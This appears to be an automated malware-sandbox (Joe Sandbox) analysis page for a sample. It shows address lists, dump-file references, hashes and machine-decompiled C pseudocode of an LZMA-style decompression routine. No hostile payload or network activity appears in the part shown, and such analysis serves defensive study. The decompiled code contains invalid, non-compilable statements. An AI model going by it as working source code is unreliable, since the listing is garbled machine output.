                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00000000
                                                              0x00407482
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x00000000
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x004075e5
                                                              0x004075eb
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00407524
                                                              0x00000000
                                                              0x00407399

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                              • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                              • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                              • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E004070AB() {
                                                              				unsigned short _t532;
                                                              				signed int _t533;
                                                              				void _t534;
                                                              				void* _t535;
                                                              				signed int _t536;
                                                              				signed int _t565;
                                                              				signed int _t568;
                                                              				signed int _t589;
                                                              				signed int* _t606;
                                                              				void* _t613;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					if( *(_t613 - 0x40) != 0) {
                                                              						L89:
                                                              						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                              						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                              						L69:
                                                              						_t606 =  *(_t613 - 0x58);
                                                              						 *(_t613 - 0x84) = 0x12;
                                                              						L132:
                                                              						 *(_t613 - 0x54) = _t606;
                                                              						L133:
                                                              						_t532 =  *_t606;
                                                              						_t589 = _t532 & 0x0000ffff;
                                                              						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                              						if( *(_t613 - 0xc) >= _t565) {
                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                              							 *(_t613 - 0x40) = 1;
                                                              							_t533 = _t532 - (_t532 >> 5);
                                                              							 *_t606 = _t533;
                                                              						} else {
                                                              							 *(_t613 - 0x10) = _t565;
                                                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                              						}
                                                              						if( *(_t613 - 0x10) >= 0x1000000) {
                                                              							L139:
                                                              							_t534 =  *(_t613 - 0x84);
                                                              							L140:
                                                              							 *(_t613 - 0x88) = _t534;
                                                              							goto L1;
                                                              						} else {
                                                              							L137:
                                                              							if( *(_t613 - 0x6c) == 0) {
                                                              								 *(_t613 - 0x88) = 5;
                                                              								goto L170;
                                                              							}
                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                              							goto L139;
                                                              						}
                                                              					} else {
                                                              						if( *(__ebp - 0x60) == 0) {
                                                              							L171:
                                                              							_t536 = _t535 | 0xffffffff;
                                                              							L172:
                                                              							return _t536;
                                                              						}
                                                              						__eax = 0;
                                                              						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                              						0 | _t258 = _t258 + _t258 + 9;
                                                              						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                              						L75:
                                                              						if( *(__ebp - 0x64) == 0) {
                                                              							 *(__ebp - 0x88) = 0x1b;
                                                              							L170:
                                                              							_t568 = 0x22;
                                                              							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                              							_t536 = 0;
                                                              							goto L172;
                                                              						}
                                                              						__eax =  *(__ebp - 0x14);
                                                              						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              						if(__eax >=  *(__ebp - 0x74)) {
                                                              							__eax = __eax +  *(__ebp - 0x74);
                                                              						}
                                                              						__edx =  *(__ebp - 8);
                                                              						__cl =  *(__eax + __edx);
                                                              						__eax =  *(__ebp - 0x14);
                                                              						 *(__ebp - 0x5c) = __cl;
                                                              						 *(__eax + __edx) = __cl;
                                                              						__eax = __eax + 1;
                                                              						__edx = 0;
                                                              						_t274 = __eax %  *(__ebp - 0x74);
                                                              						__eax = __eax /  *(__ebp - 0x74);
                                                              						__edx = _t274;
                                                              						__eax =  *(__ebp - 0x68);
                                                              						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              						_t283 = __ebp - 0x64;
                                                              						 *_t283 =  *(__ebp - 0x64) - 1;
                                                              						 *( *(__ebp - 0x68)) = __cl;
                                                              						L79:
                                                              						 *(__ebp - 0x14) = __edx;
                                                              						L80:
                                                              						 *(__ebp - 0x88) = 2;
                                                              					}
                                                              					L1:
                                                              					_t535 =  *(_t613 - 0x88);
                                                              					if(_t535 > 0x1c) {
                                                              						goto L171;
                                                              					}
                                                              					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                              						case 0:
                                                              							if( *(_t613 - 0x6c) == 0) {
                                                              								goto L170;
                                                              							}
                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              							_t535 =  *( *(_t613 - 0x70));
                                                              							if(_t535 > 0xe1) {
                                                              								goto L171;
                                                              							}
                                                              							_t539 = _t535 & 0x000000ff;
                                                              							_push(0x2d);
                                                              							asm("cdq");
                                                              							_pop(_t570);
                                                              							_push(9);
                                                              							_pop(_t571);
                                                              							_t609 = _t539 / _t570;
                                                              							_t541 = _t539 % _t570 & 0x000000ff;
                                                              							asm("cdq");
                                                              							_t604 = _t541 % _t571 & 0x000000ff;
                                                              							 *(_t613 - 0x3c) = _t604;
                                                              							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                              							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                              							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                              							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                              								L10:
                                                              								if(_t612 == 0) {
                                                              									L12:
                                                              									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              									goto L15;
                                                              								} else {
                                                              									goto L11;
                                                              								}
                                                              								do {
                                                              									L11:
                                                              									_t612 = _t612 - 1;
                                                              									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                              								} while (_t612 != 0);
                                                              								goto L12;
                                                              							}
                                                              							if( *(_t613 - 4) != 0) {
                                                              								GlobalFree( *(_t613 - 4));
                                                              							}
                                                              							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                              							 *(_t613 - 4) = _t535;
                                                              							if(_t535 == 0) {
                                                              								goto L171;
                                                              							} else {
                                                              								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                              								goto L10;
                                                              							}
                                                              						case 1:
                                                              							L13:
                                                              							__eflags =  *(_t613 - 0x6c);
                                                              							if( *(_t613 - 0x6c) == 0) {
                                                              								 *(_t613 - 0x88) = 1;
                                                              								goto L170;
                                                              							}
                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              							_t45 = _t613 - 0x48;
                                                              							 *_t45 =  *(_t613 - 0x48) + 1;
                                                              							__eflags =  *_t45;
                                                              							L15:
                                                              							if( *(_t613 - 0x48) < 4) {
                                                              								goto L13;
                                                              							}
                                                              							_t547 =  *(_t613 - 0x40);
                                                              							if(_t547 ==  *(_t613 - 0x74)) {
                                                              								L20:
                                                              								 *(_t613 - 0x48) = 5;
                                                              								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                              								goto L23;
                                                              							}
                                                              							 *(_t613 - 0x74) = _t547;
                                                              							if( *(_t613 - 8) != 0) {
                                                              								GlobalFree( *(_t613 - 8));
                                                              							}
                                                              							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                              							 *(_t613 - 8) = _t535;
                                                              							if(_t535 == 0) {
                                                              								goto L171;
                                                              							} else {
                                                              								goto L20;
                                                              							}
                                                              						case 2:
                                                              							L24:
                                                              							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                              							 *(_t613 - 0x84) = 6;
                                                              							 *(_t613 - 0x4c) = _t554;
                                                              							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                              							goto L132;
                                                              						case 3:
                                                              							L21:
                                                              							__eflags =  *(_t613 - 0x6c);
                                                              							if( *(_t613 - 0x6c) == 0) {
                                                              								 *(_t613 - 0x88) = 3;
                                                              								goto L170;
                                                              							}
                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              							_t67 = _t613 - 0x70;
                                                              							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                              							__eflags =  *_t67;
                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                              							L23:
                                                              							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                              							if( *(_t613 - 0x48) != 0) {
                                                              								goto L21;
                                                              							}
                                                              							goto L24;
                                                              						case 4:
                                                              							goto L133;
                                                              						case 5:
                                                              							goto L137;
                                                              						case 6:
                                                              							__edx = 0;
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 4);
                                                              								__ecx =  *(__ebp - 0x38);
                                                              								 *(__ebp - 0x34) = 1;
                                                              								 *(__ebp - 0x84) = 7;
                                                              								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                              								goto L132;
                                                              							}
                                                              							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              							__esi =  *(__ebp - 0x60);
                                                              							__cl = 8;
                                                              							__cl = 8 -  *(__ebp - 0x3c);
                                                              							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              							__ecx =  *(__ebp - 0x3c);
                                                              							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              							__ecx =  *(__ebp - 4);
                                                              							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              							__eflags =  *(__ebp - 0x38) - 4;
                                                              							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              							if( *(__ebp - 0x38) >= 4) {
                                                              								__eflags =  *(__ebp - 0x38) - 0xa;
                                                              								if( *(__ebp - 0x38) >= 0xa) {
                                                              									_t98 = __ebp - 0x38;
                                                              									 *_t98 =  *(__ebp - 0x38) - 6;
                                                              									__eflags =  *_t98;
                                                              								} else {
                                                              									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              								}
                                                              							} else {
                                                              								 *(__ebp - 0x38) = 0;
                                                              							}
                                                              							__eflags =  *(__ebp - 0x34) - __edx;
                                                              							if( *(__ebp - 0x34) == __edx) {
                                                              								__ebx = 0;
                                                              								__ebx = 1;
                                                              								goto L61;
                                                              							} else {
                                                              								__eax =  *(__ebp - 0x14);
                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                              									__eflags = __eax;
                                                              								}
                                                              								__ecx =  *(__ebp - 8);
                                                              								__ebx = 0;
                                                              								__ebx = 1;
                                                              								__al =  *((intOrPtr*)(__eax + __ecx));
                                                              								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              								goto L41;
                                                              							}
                                                              						case 7:
                                                              							__eflags =  *(__ebp - 0x40) - 1;
                                                              							if( *(__ebp - 0x40) != 1) {
                                                              								__eax =  *(__ebp - 0x24);
                                                              								 *(__ebp - 0x80) = 0x16;
                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              								__eax =  *(__ebp - 0x28);
                                                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              								__eax =  *(__ebp - 0x2c);
                                                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              								__eax = 0;
                                                              								__eflags =  *(__ebp - 0x38) - 7;
                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              								__al = __al & 0x000000fd;
                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                              								__eax =  *(__ebp - 4);
                                                              								__eax =  *(__ebp - 4) + 0x664;
                                                              								__eflags = __eax;
                                                              								 *(__ebp - 0x58) = __eax;
                                                              								goto L69;
                                                              							}
                                                              							__eax =  *(__ebp - 4);
                                                              							__ecx =  *(__ebp - 0x38);
                                                              							 *(__ebp - 0x84) = 8;
                                                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                              							goto L132;
                                                              						case 8:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 4);
                                                              								__ecx =  *(__ebp - 0x38);
                                                              								 *(__ebp - 0x84) = 0xa;
                                                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                              							} else {
                                                              								__eax =  *(__ebp - 0x38);
                                                              								__ecx =  *(__ebp - 4);
                                                              								__eax =  *(__ebp - 0x38) + 0xf;
                                                              								 *(__ebp - 0x84) = 9;
                                                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                              							}
                                                              							goto L132;
                                                              						case 9:
                                                              							goto L0;
                                                              						case 0xa:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 4);
                                                              								__ecx =  *(__ebp - 0x38);
                                                              								 *(__ebp - 0x84) = 0xb;
                                                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                              								goto L132;
                                                              							}
                                                              							__eax =  *(__ebp - 0x28);
                                                              							goto L88;
                                                              						case 0xb:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__ecx =  *(__ebp - 0x24);
                                                              								__eax =  *(__ebp - 0x20);
                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              							} else {
                                                              								__eax =  *(__ebp - 0x24);
                                                              							}
                                                              							__ecx =  *(__ebp - 0x28);
                                                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              							L88:
                                                              							__ecx =  *(__ebp - 0x2c);
                                                              							 *(__ebp - 0x2c) = __eax;
                                                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              							goto L89;
                                                              						case 0xc:
                                                              							L99:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0xc;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t334 = __ebp - 0x70;
                                                              							 *_t334 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t334;
